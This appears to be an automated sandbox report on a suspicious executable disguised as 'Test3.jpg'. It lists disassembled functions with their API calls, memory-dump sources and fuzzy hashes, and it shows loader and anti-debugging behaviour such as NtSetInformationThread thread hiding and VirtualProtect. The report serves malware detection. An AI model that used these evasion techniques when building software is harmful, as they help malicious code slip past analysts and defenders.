                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __vbaAryUnlock.MSVBVM60(?), ref: 00426762
                                                                                                                                                        • __vbaFreeStrList.MSVBVM60(00000007,?,?,?,?,?,?,?), ref: 00426786
                                                                                                                                                        • __vbaFreeObj.MSVBVM60 ref: 00426792
                                                                                                                                                        • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042679E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.360553952.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.360543174.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360729782.0000000000598000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360740463.0000000000599000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360749965.000000000059B000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __vba$Free$DestructListUnlock
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 676089279-0
                                                                                                                                                        • Opcode ID: 27cda999378808c5a51536fe280f59dd2f3ed4b724b4c8446b224a74c7cd5032
                                                                                                                                                        • Instruction ID: 63f266a5615644bcb3afa4b91b961dcc03066c07fcf0ec27beaceca1278d5122
                                                                                                                                                        • Opcode Fuzzy Hash: 27cda999378808c5a51536fe280f59dd2f3ed4b724b4c8446b224a74c7cd5032
                                                                                                                                                        • Instruction Fuzzy Hash: 3DF074B280020DAFDF15CBE0DD89EEEB778FB58705F14811AE216AB055EA70264DDF60
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004284BC, Relevance: 6.0, APIs: 4, Instructions: 15COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __vbaAryUnlock.MSVBVM60(?), ref: 004284C0
                                                                                                                                                        • __vbaFreeStr.MSVBVM60 ref: 004284C9
                                                                                                                                                        • __vbaFreeObj.MSVBVM60 ref: 004284D2
                                                                                                                                                        • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 004284E2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.360553952.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.360543174.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360729782.0000000000598000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360740463.0000000000599000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360749965.000000000059B000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __vba$Free$ListUnlock
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3483974764-0
                                                                                                                                                        • Opcode ID: 3b1c72177236f4fdabf937fa75915d0527a724249052586cd922c9bb81f8efbc
                                                                                                                                                        • Instruction ID: 02eb14f7227d769c40dc428450aed78d07489d068525da6201e10b7c136aec73
                                                                                                                                                        • Opcode Fuzzy Hash: 3b1c72177236f4fdabf937fa75915d0527a724249052586cd922c9bb81f8efbc
                                                                                                                                                        • Instruction Fuzzy Hash: A7E0427080010EAFDB04DB90EC9DAFEBB38FF61709F41841AB552A6164EE74260EEB51
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Analysis Process: Test3.jpg PID: 3180 Parent PID: 4928 Test3.jpgCOMMON

                                                                                                                                                        Executed Functions

                                                                                                                                                        Function 0044A238, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0044A23D
                                                                                                                                                        • new.LIBCMT ref: 0044A263
                                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,?,00000000), ref: 0044A28A
                                                                                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 0044A2F6
                                                                                                                                                        • GetSystemInfo.KERNELBASE(?,?,?,?,?,?,00000000), ref: 0044A350
                                                                                                                                                        • GetProductInfo.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,00000000), ref: 0044A362
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Info$AddressH_prologHandleModuleProcProductSystem
                                                                                                                                                        • String ID: C
                                                                                                                                                        • API String ID: 1760484215-1037565863
                                                                                                                                                        • Opcode ID: 33d6bb144d07babe7e865a32b2f65c83d434f85cc2b73c6b037fdc2134ee5aa5
                                                                                                                                                        • Instruction ID: 009187f9c81201dab3b4478d4f28a080c39f07a6fe5d199cd4262a1a6a5f31ab
                                                                                                                                                        • Opcode Fuzzy Hash: 33d6bb144d07babe7e865a32b2f65c83d434f85cc2b73c6b037fdc2134ee5aa5
                                                                                                                                                        • Instruction Fuzzy Hash: 97412472D00349AAEB10EFB9DC41AEEFBB9EF54304F10413EE905A7261EB345E488B55
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00478772, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104threadlibrarynativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00478777
                                                                                                                                                        • GetModuleHandleA.KERNEL32(?,00000000,?,?,00000000,00000000), ref: 00478826
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0047882D
                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 00478865
                                                                                                                                                        • NtSetInformationThread.NTDLL(?,00000011,00000000,00000000,?,?,00000000,00000000), ref: 0047886C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Thread$AddressCurrentH_prologHandleInformationModuleProc
                                                                                                                                                        • String ID: {
                                                                                                                                                        • API String ID: 2756751113-366298937
                                                                                                                                                        • Opcode ID: 8f28c65f12d23a2e67ce7319abdb53001a4198f6ae775b26233792442d8a0618
                                                                                                                                                        • Instruction ID: 044747a7e7f62a26b8d36d9ac3d137600a65fbad34c62cb69a76f03b8dc71556
                                                                                                                                                        • Opcode Fuzzy Hash: 8f28c65f12d23a2e67ce7319abdb53001a4198f6ae775b26233792442d8a0618
                                                                                                                                                        • Instruction Fuzzy Hash: BC314672D013499ADB10DFFD98846EEBBB8BF64304F24417FE40AA7211DB348E088755
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 007D5210, Relevance: 7.7, APIs: 5, Instructions: 212librarymemoryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 007D535A
                                                                                                                                                        • GetProcAddress.KERNEL32(?,007C0FF9), ref: 007D536F
                                                                                                                                                        • ExitProcess.KERNEL32(?,007C0FF9), ref: 007D5380
                                                                                                                                                        • VirtualProtect.KERNELBASE(00400000,00001000,00000004,?,00000000), ref: 007D53CE
                                                                                                                                                        • VirtualProtect.KERNELBASE(00400000,00001000), ref: 007D53E3
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1996367037-0
                                                                                                                                                        • Opcode ID: 64163de4ecb477ef917331caf0aed33f3393101877177417cc64edfb7b2e678b
                                                                                                                                                        • Instruction ID: a5152ef3323b81fa670cb61d0721a4ac0abc0c45bde044f9d52897b9e83e0cbf
                                                                                                                                                        • Opcode Fuzzy Hash: 64163de4ecb477ef917331caf0aed33f3393101877177417cc64edfb7b2e678b
                                                                                                                                                        • Instruction Fuzzy Hash: 8D6149B2A45B424BD7208EB8DCC06657BB0FB15364718073AD5E1CB3C6E7E8780E87A0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004139F1, Relevance: 7.6, APIs: 5, Instructions: 128timeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004139F6
                                                                                                                                                          • Part of subcall function 00413C4E: __EH_prolog.LIBCMT ref: 00413C53
                                                                                                                                                          • Part of subcall function 00413C4E: GetTickCount64.KERNEL32 ref: 00413C70
                                                                                                                                                        • GetSystemTimes.KERNELBASE(?,?,?), ref: 00413A60
                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,?,?), ref: 00413A7A
                                                                                                                                                        • GetProcessTimes.KERNELBASE(00000000), ref: 00413A81
                                                                                                                                                        • GetTickCount64.KERNEL32 ref: 00413B79
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Count64H_prologProcessTickTimes$CurrentSystem
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2284428309-0
                                                                                                                                                        • Opcode ID: 166c6087c2440a790dc45eb80621aa69fac31f17c9776db3ebe74335e0106ef6
                                                                                                                                                        • Instruction ID: dedbf5ab10423884d2463da0fe5e45a3e038a9486860fcb153a760f40e7fbaf5
                                                                                                                                                        • Opcode Fuzzy Hash: 166c6087c2440a790dc45eb80621aa69fac31f17c9776db3ebe74335e0106ef6
                                                                                                                                                        • Instruction Fuzzy Hash: 1E512BB1D056289FCB05DFE9D9819DEBBB8FF08341B54812BE505E3211E7385A86CB98
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004AABEB, Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 16memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,0077B364,?,3cB,?,0077B364,3cB,?,?,?,?,?,?,?,00426333,00000000), ref: 004AABFD
                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,3cB,?,0077B364,3cB,?,?,?,?,?,?,?,00426333,00000000), ref: 004AAC04
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$FreeProcess
                                                                                                                                                        • String ID: 3cB
                                                                                                                                                        • API String ID: 3859560861-258906627
                                                                                                                                                        • Opcode ID: f724120f4ea331f0a200b07339ef64e75f88815a6b29432750fdede8726ffcb2
                                                                                                                                                        • Instruction ID: 9bcdbf44dc84f5c5994a0a12eda6f1c2eb48691b5e052835848fd8e76fbf8af4
                                                                                                                                                        • Opcode Fuzzy Hash: f724120f4ea331f0a200b07339ef64e75f88815a6b29432750fdede8726ffcb2
                                                                                                                                                        • Instruction Fuzzy Hash: 10D0C935641224ABDB106F9AEC1DB8A7F6DEF497A2F400452F64ECB690CA6168008BE0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00415B0A, Relevance: 1.6, APIs: 1, Instructions: 59networkCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 00415B29
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Recv
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4192927123-0
                                                                                                                                                        • Opcode ID: c6f6e85bffea254f77cb26dea6172b0e3e397fa52f234fdbb43bd312ce0258d8
                                                                                                                                                        • Instruction ID: 8c06b232c88e2d5d819fbe970940a6bd2d7eab4998f675cd6304a8e84c823aba
                                                                                                                                                        • Opcode Fuzzy Hash: c6f6e85bffea254f77cb26dea6172b0e3e397fa52f234fdbb43bd312ce0258d8
                                                                                                                                                        • Instruction Fuzzy Hash: 9011A5B5904609EFDB208F45C8848FBF76DFB95364B10416BF81553390D7786D9087A5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00569841, Relevance: 59.7, APIs: 3, Strings: 31, Instructions: 171COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00569846
                                                                                                                                                        • new.LIBCMT ref: 0056986D
                                                                                                                                                          • Part of subcall function 0056912E: __EH_prolog.LIBCMT ref: 00569133
                                                                                                                                                          • Part of subcall function 0056912E: new.LIBCMT ref: 00569160
                                                                                                                                                          • Part of subcall function 0056912E: RtlInitializeCriticalSection.NTDLL(0000001C), ref: 00569183
                                                                                                                                                          • Part of subcall function 0056912E: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,00569880,?,?,?,0040F0A6), ref: 0056919A
                                                                                                                                                        • _wprintf.LEGACY_STDIO_DEFINITIONS ref: 005698AE
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$CreateCriticalEventInitializeSection_wprintf
                                                                                                                                                        • String ID: ***** VIDEOINPUT LIBRARY - %2.04f - TFW07 *****$ ty$AYUV$AYUV$I420$I420$IYUV$IYUV$MJPG$MJPG$UYVY$UYVY$Y211$Y211$Y411$Y411$Y41P$Y41P$YUY2$YUY2$YUYV$YUYV$YV12$YV12$YVU9$YVU9$YVYU$YVYU$pty$pty$puy
                                                                                                                                                        • API String ID: 550282347-1340230982
                                                                                                                                                        • Opcode ID: 9ea17990b845eb72ec66ed40ab00fce0eea12a8a69fbaa200a3da4d192a8331e
                                                                                                                                                        • Instruction ID: 7ae9071a160ba6b8b37fc6670b78ed947b6d038beff31a4c3460d95eb36020a3
                                                                                                                                                        • Opcode Fuzzy Hash: 9ea17990b845eb72ec66ed40ab00fce0eea12a8a69fbaa200a3da4d192a8331e
                                                                                                                                                        • Instruction Fuzzy Hash: B5412A62D28D9587EB4BCE1864052936A939F83724F1A4175BE0C2F362E6FF8D52C7C4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00414AA6, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 124synchronizationCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,00414E92,00000000,00000000,?,?,00000000,00000000), ref: 00414ABB
                                                                                                                                                        • GetLastError.KERNEL32(?,?,00414E92,00000000,00000000,?,?,00000000,00000000), ref: 00414ACD
                                                                                                                                                          • Part of subcall function 0041046E: __EH_prolog.LIBCMT ref: 00410473
                                                                                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00414E92,00000000,00000000,?,?,00000000,00000000), ref: 00414B0F
                                                                                                                                                        • GetLastError.KERNEL32(?,?,00414E92,00000000,00000000,?,?,00000000,00000000), ref: 00414B21
                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00414E92,00000000), ref: 00414B86
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00414E92,00000000), ref: 00414B9C
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00414E92,00000000), ref: 00414BAA
                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,?,00414E92,00000000), ref: 00414BDB
                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,00414E92,00000000), ref: 00414BE2
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseErrorLast$CreateEventHandle$ChangeFindH_prologNotificationObjectSingleWait
                                                                                                                                                        • String ID: thread$thread.entry_event$thread.exit_event
                                                                                                                                                        • API String ID: 915737812-3017686385
                                                                                                                                                        • Opcode ID: 54ecb7f4cc990d128ff9dd6adcba3b8ab5eabf9a48d6803ac0dabb34691e5255
                                                                                                                                                        • Instruction ID: d36b434f2dd0b05cf559dbd752a2e27d4b00dd4d6e2787cc1cb756c4aafba879
                                                                                                                                                        • Opcode Fuzzy Hash: 54ecb7f4cc990d128ff9dd6adcba3b8ab5eabf9a48d6803ac0dabb34691e5255
                                                                                                                                                        • Instruction Fuzzy Hash: D24174B4A00215AFDB10DFA5C844BAEBBB9EF84750F14416AE845E7341DB74AD81CBE1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040911C, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 171libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • new.LIBCMT ref: 004C8734
                                                                                                                                                        • GetModuleHandleA.KERNEL32(?), ref: 004C87A3
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 004C882A
                                                                                                                                                        • GetModuleHandleA.KERNEL32(?,00000000,00000024), ref: 004C88D9
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004C88E0
                                                                                                                                                        • GetNativeSystemInfo.KERNELBASE(?), ref: 004C88F2
                                                                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 004C88FE
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressHandleInfoModuleProcSystem$Native
                                                                                                                                                        • String ID: 9$Y
                                                                                                                                                        • API String ID: 4128499644-933498875
                                                                                                                                                        • Opcode ID: c8854cc5d69746fc508a4a1194bd38a194f9e36169c7678442b6afa28b508893
                                                                                                                                                        • Instruction ID: e5334028a4dcdd2dfaa58a0285a661532b2c157512a1408916922bee01535160
                                                                                                                                                        • Opcode Fuzzy Hash: c8854cc5d69746fc508a4a1194bd38a194f9e36169c7678442b6afa28b508893
                                                                                                                                                        • Instruction Fuzzy Hash: F25178315083819AE321DF3CDD45BAAF7E8FF98304F105A1EEAC9D2062EB74E5858746
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00415656, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91timeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0041565B
                                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 0041566F
                                                                                                                                                        • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 00415692
                                                                                                                                                        • GetLastError.KERNEL32 ref: 0041569F
                                                                                                                                                          • Part of subcall function 0041046E: __EH_prolog.LIBCMT ref: 00410473
                                                                                                                                                        • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 004156EB
                                                                                                                                                        • new.LIBCMT ref: 004156F9
                                                                                                                                                        • new.LIBCMT ref: 00415712
                                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 00415756
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalH_prologSectionTimerWaitable$CreateEnterErrorLastLeave
                                                                                                                                                        • String ID: timer
                                                                                                                                                        • API String ID: 80991882-1792073242
                                                                                                                                                        • Opcode ID: 17fe8ad99e405f6a08de1784b28ce600328c0de83fe899afd959e253062f75be
                                                                                                                                                        • Instruction ID: 3d12fd47e9e49450431f38a7a975eb8fb3334f85ebb861518eb8ef93f317d798
                                                                                                                                                        • Opcode Fuzzy Hash: 17fe8ad99e405f6a08de1784b28ce600328c0de83fe899afd959e253062f75be
                                                                                                                                                        • Instruction Fuzzy Hash: 053180B0D01644DFDB04DF69C884BEEBBF9EF49310F10816EE845A7241D7B88A84CBA5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004CB792, Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 274COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004CB797
                                                                                                                                                        • _strlen.LIBCMT ref: 004CB875
                                                                                                                                                        • __aulldiv.LIBCMT ref: 004CB8A8
                                                                                                                                                        • _strlen.LIBCMT ref: 004CB92D
                                                                                                                                                          • Part of subcall function 004E5CBF: __EH_prolog.LIBCMT ref: 004E5CC4
                                                                                                                                                          • Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog_strlen$Deallocate__aulldivstd::_
                                                                                                                                                        • String ID: $$con
                                                                                                                                                        • API String ID: 378162486-3754756350
                                                                                                                                                        • Opcode ID: 9bfbf88add07bd3cd76a0593f34175b53194876b6c18634acadd3233875da34f
                                                                                                                                                        • Instruction ID: 7f079c7b8ee85b9069eda5d8b516ae7a614e8914cd09278db4bba0eb9efb7fac
                                                                                                                                                        • Opcode Fuzzy Hash: 9bfbf88add07bd3cd76a0593f34175b53194876b6c18634acadd3233875da34f
                                                                                                                                                        • Instruction Fuzzy Hash: A4A1B7B1C04248AEDB04EFA5DC42FEEBB78EF15314F20815EF516A7191DB785A44CBA8
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 006A3548, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 216COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,00000001,00000001,00000001,?,?,?,006A3799,00000001,00000001,?), ref: 006A35A2
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,006A3799,00000001,00000001,?,00000001,?,?), ref: 006A3628
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,00000001,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 006A3722
                                                                                                                                                        • __freea.LIBCMT ref: 006A372F
                                                                                                                                                          • Part of subcall function 00697D9E: RtlAllocateHeap.NTDLL(00000000,00000003,00000003), ref: 00697DD0
                                                                                                                                                        • __freea.LIBCMT ref: 006A3738
                                                                                                                                                        • __freea.LIBCMT ref: 006A375D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                        • String ID: )K7~
                                                                                                                                                        • API String ID: 1414292761-2802557318
                                                                                                                                                        • Opcode ID: 853f05da59ad018e205bf18081d07606692e75025c2cc224698217167ad8c810
                                                                                                                                                        • Instruction ID: cd0d0aef3957dffa610732502916bef9f0979c51aa3ce93d2106b75626cbf92e
                                                                                                                                                        • Opcode Fuzzy Hash: 853f05da59ad018e205bf18081d07606692e75025c2cc224698217167ad8c810
                                                                                                                                                        • Instruction Fuzzy Hash: 1351E3B2A00226ABDB25AF64DC45EFB77ABEF42750F144629FD05D6340EB34DE40CA64
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0069D74F, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 187COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free$AllocateHeap
                                                                                                                                                        • String ID: )K7~$t9q
                                                                                                                                                        • API String ID: 3033488037-3483687641
                                                                                                                                                        • Opcode ID: 6a156c94e4eae3fad0a3b7dc019a512f05d04696155d1252bbfe3e08a50e4f28
                                                                                                                                                        • Instruction ID: 680ff7d26a39c14098c966f3189144709acdc12779e139fe7e295ebb025c8af5
                                                                                                                                                        • Opcode Fuzzy Hash: 6a156c94e4eae3fad0a3b7dc019a512f05d04696155d1252bbfe3e08a50e4f28
                                                                                                                                                        • Instruction Fuzzy Hash: 9651C171A00204ABDF20DF29CD41BAA77FAEF45720F14457DE849DBA91E731E9028B84
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004AA0C8, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 56COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004AA0CD
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 004AA0DC
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 004AA0FC
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004AA133
